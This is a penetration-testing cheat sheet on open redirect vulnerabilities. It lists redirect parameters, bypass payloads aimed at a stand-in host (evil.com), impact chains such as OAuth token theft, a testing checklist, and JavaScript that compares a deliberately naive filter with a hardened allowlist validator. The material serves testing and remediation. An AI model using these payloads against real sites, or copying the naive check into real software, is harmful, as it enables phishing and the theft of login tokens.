
Open Redirect

Open redirect vulnerabilities and bypass techniques

Common Parameters

```text
?url=
?redirect=
?next=
?dest=
?destination=
?redir=
?redirect_uri=
?return=
?return_to=
?returnTo=
?go=
?goto=
?link=
?target=
?out=
?continue=
?view=
?image_url=
?checkout_url=
```

Basic Payloads

```text
https://evil.com
//evil.com
/\evil.com
\/evil.com
```

Browsers treat `\` as `/` in http(s) URLs, so the last two resolve to `https://evil.com` exactly like the scheme-relative `//evil.com`, while a filter that only requires a leading `/` (or rejects `//`) lets them through.

Bypass Techniques

Domain Confusion

```text
https://target.com@evil.com
https://evil.com#@target.com
https://evil.com\@target.com
https://target.com.evil.com
```

Everything before `@` in the authority is userinfo, so the browser's host in the first payload is `evil.com`; a check that merely looks for `target.com` in the string is fooled. In the second the `#` starts the fragment, and in the third the `\` ends the authority (browsers treat it as `/`), so `@target.com` never becomes part of the host. The last one is an ordinary subdomain and defeats `startswith`/`contains` checks that are not anchored to the end of the hostname.

Protocol Bypass

```text
//evil.com
///evil.com
////evil.com
/\/evil.com
```

A leading `//` is a scheme-relative URL, and browsers collapse any run of leading `/` and `\` in http(s) URLs before reading the authority, so all four land on `https://evil.com` even when the filter insists the value begin with `/` or rejects an exact `//` prefix.

Encoding

```text
https://evil.com%00.target.com
https://evil.com%20.target.com
https://evil%2Ecom
%68%74%74%70%3a%2f%2f%65%76%69%6c%2e%63%6f%6d
```

The `%00` and `%20` forms aim at server-side string handling (for example a C-style string that ends at the NUL, or a parser that trims whitespace) rather than at the browser: a browser refuses a hostname that decodes to a NUL or a space, so these only pay off when the server truncates or rewrites the value before emitting it. `%2E` is decoded to `.` by the browser, so `evil%2Ecom` resolves to `evil.com` while a denylist matching the literal string does not fire. The fully percent-encoded URL is just a relative path on the original host unless the application decodes the parameter a second time before redirecting.

Unicode/Special Characters

```text
https://evil.com%E3%80%82target.com
https://evil。com
https://evіl.com  (Cyrillic і)
```

Browsers run the hostname through IDNA mapping before resolving it, which turns U+3002 (ideographic full stop) and similar characters into an ASCII dot; a byte-oriented filter sees no dot there, so the filter and the browser disagree about where the host's labels begin and end. Note the direction: `evil.com。target.com` resolves as `evil.com.target.com`, so confirm in the target browser which host the final URL actually reaches before reporting. The Cyrillic homograph is a separate, attacker-registered domain (it is sent as punycode); it is useful for phishing and against string denylists, not against an allowlist of parsed hostnames.

Path-Based

```text
/https://evil.com
///evil.com/../../
/redirect/https://evil.com
```

`/https://evil.com` is a path on the original host as far as the browser is concerned; it turns into a redirect only when the application strips the leading slash, joins the value to a base with string concatenation, or re-parses it later. The third form is for redirect endpoints that take the destination as a path segment rather than a query parameter.

JavaScript Redirect

```text
javascript:alert(document.domain)//
data:text/html,<script>document.location='https://evil.com'</script>
```

These only work when the redirect happens client-side (`location = value`, `location.href = value`, `window.open(value)`): an HTTP `Location:` header carrying a `javascript:` URL does not execute anything. Current browsers also block page-initiated top-level navigation to `data:` URLs, so the second payload is mainly relevant for older clients.
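The payloads in the bypass sections above and in this one all rely on the same gap: the filter reasons about the raw string, the browser reasons about the parsed URL. The following is an added example, not code from the original page: it runs each payload through Node's WHATWG `URL` parser (the same algorithm browsers use) against an assumed, hypothetical vulnerable page `https://target.com/login`, beside a deliberately naive substring filter, so the two views can be compared side by side.

```javascript
// Added example (not from the original page). BASE is a hypothetical
// vulnerable page; the payload list is copied from the sections above,
// with JS string escapes only for the backslashes.
const BASE = "https://target.com/login";

// Resolve a redirect value the way a browser does after `location = value`
// or a `Location:` header. Returns null when the parser refuses the URL
// outright (e.g. a hostname that percent-decodes to a NUL or a space).
function browserView(value, base = BASE) {
  try {
    const u = new URL(value, base);
    return { protocol: u.protocol, hostname: u.hostname, username: u.username };
  } catch {
    return null;
  }
}

// The kind of check these payloads are written to defeat: a prefix /
// substring test on the raw parameter instead of on the parsed hostname.
function naiveFilterAllows(value) {
  return value.startsWith("/") || value.includes("target.com");
}

const PAYLOADS = [
  "https://evil.com",
  "//evil.com",
  "/\\evil.com",
  "\\/evil.com",
  "https://target.com@evil.com",
  "https://evil.com#@target.com",
  "https://evil.com\\@target.com",
  "https://target.com.evil.com",
  "///evil.com",
  "////evil.com",
  "/\\/evil.com",
  "https://evil.com%00.target.com",
  "https://evil.com%20.target.com",
  "https://evil%2Ecom",
  "%68%74%74%70%3a%2f%2f%65%76%69%6c%2e%63%6f%6d",
  "https://evil.com%E3%80%82target.com",
  "https://ev\u0456l.com", // Cyrillic і
  "/https://evil.com",
  "javascript:alert(document.domain)//",
];

// One row per payload: does the naive filter let it through, and what does
// the browser actually resolve it to?
function payloadMatrix() {
  return PAYLOADS.map((p) => ({
    payload: p,
    naiveAllows: naiveFilterAllows(p),
    browser: browserView(p),
  }));
}

if (typeof require !== "undefined" && require.main === module) {
  console.table(
    payloadMatrix().map((r) => ({
      payload: r.payload,
      naiveAllows: r.naiveAllows,
      protocol: r.browser ? r.browser.protocol : "(rejected)",
      hostname: r.browser ? r.browser.hostname : "(rejected)",
    }))
  );
}
```

Reading the table: every `@`, `\` and leading-slash variant ends on `evil.com` with the filter's blessing; the `%00`/`%20` forms are rejected by the parser and so only matter to server-side handling; the fully encoded URL and `/https://evil.com` stay on `target.com` unless the server decodes or strips them; and the ideographic-dot payload resolves under `target.com`, which is why its orientation has to be checked in the real browser.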

Impact Escalation

```text
1. Phishing - the link carries the trusted domain but lands on a lookalike
2. OAuth token theft - an open redirect on a registered redirect_uri host, combined with loose redirect_uri matching at the provider, forwards the code or token to the attacker
3. SSO bypass - return/RelayState-style URLs that carry a completed login to an attacker page
4. Chain with XSS - when the redirect is client-side and accepts javascript:
```

Testing Checklist

```text
□ Identify redirect parameters
□ Test external domain
□ Try bypass techniques
□ Test encoding variations
□ Check for JavaScript protocol
□ Document for OAuth chaining
```
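Working through the checklist is quicker with a fixture that shows which check a given redirect endpoint is likely to be using. The following is an added example, not code from the original page: the prefix check that the bypasses target, beside a validator that parses the value the way the browser will and then matches the parsed host exactly. The origin `https://target.com` and the `ALLOWED_HOSTS` set are assumptions; the test inputs are constructed from the payload classes above.

```javascript
// Added example (not from the original page). ORIGIN and ALLOWED_HOSTS are
// assumed values for a hypothetical application.
const ORIGIN = "https://target.com";
const ALLOWED_HOSTS = new Set(["target.com", "accounts.target.com"]);

// Vulnerable: a prefix test on the raw parameter. `//evil.com`, `/\evil.com`,
// `https://target.com@evil.com` and `https://target.com.evil.com` all pass.
function naiveIsSafe(value) {
  return value.startsWith("/") || value.startsWith(ORIGIN);
}

// Hardened: returns the normalised URL to redirect to, or null to refuse.
// The returned href, not the raw parameter, is what goes into the Location
// header, so no later decode/strip step can reintroduce the bug.
function safeRedirectTarget(value) {
  if (typeof value !== "string" || value.length > 2048) return null;
  let u;
  try {
    u = new URL(value, ORIGIN); // relative paths resolve against our origin
  } catch {
    return null; // unparsable: refuse rather than guess
  }
  if (u.protocol !== "https:") return null;                 // javascript:, data:, http:
  if (u.username !== "" || u.password !== "") return null;  // target.com@evil.com
  if (u.port !== "") return null;                           // target.com:8443
  if (!ALLOWED_HOSTS.has(u.hostname)) return null;          // exact match, no endsWith/includes
  return u.href;
}

// Constructed inputs: two legitimate values, then one per bypass class above.
const CASES = [
  "/account",
  "https://accounts.target.com/login?next=/",
  "//evil.com",
  "/\\evil.com",
  "https://target.com@evil.com",
  "https://evil.com\\@target.com",
  "https://target.com.evil.com",
  "https://evil.com%E3%80%82target.com",
  "https://evil.com#@target.com",
  "javascript:alert(document.domain)//",
];

// For every case, what each check decides. The naive check passes four of
// the eight hostile inputs (and wrongly rejects the accounts.target.com one);
// the hardened check refuses all eight and keeps both legitimate values.
function compareChecks() {
  return CASES.map((v) => ({
    value: v,
    naive: naiveIsSafe(v),
    hardened: safeRedirectTarget(v),
  }));
}

if (typeof require !== "undefined" && require.main === module) {
  console.table(compareChecks());
}
```

When a parameter survives the checklist's bypass steps, the hardened half is the remediation to recommend: parse first, compare the parsed hostname against an exact allowlist, reject credentials and non-https schemes, and emit the normalised `href`. An `endsWith("target.com")` or `includes("target.com")` on the parsed host would reopen the `target.com.evil.com`-style cases; a check on the raw string before parsing reopens the rest.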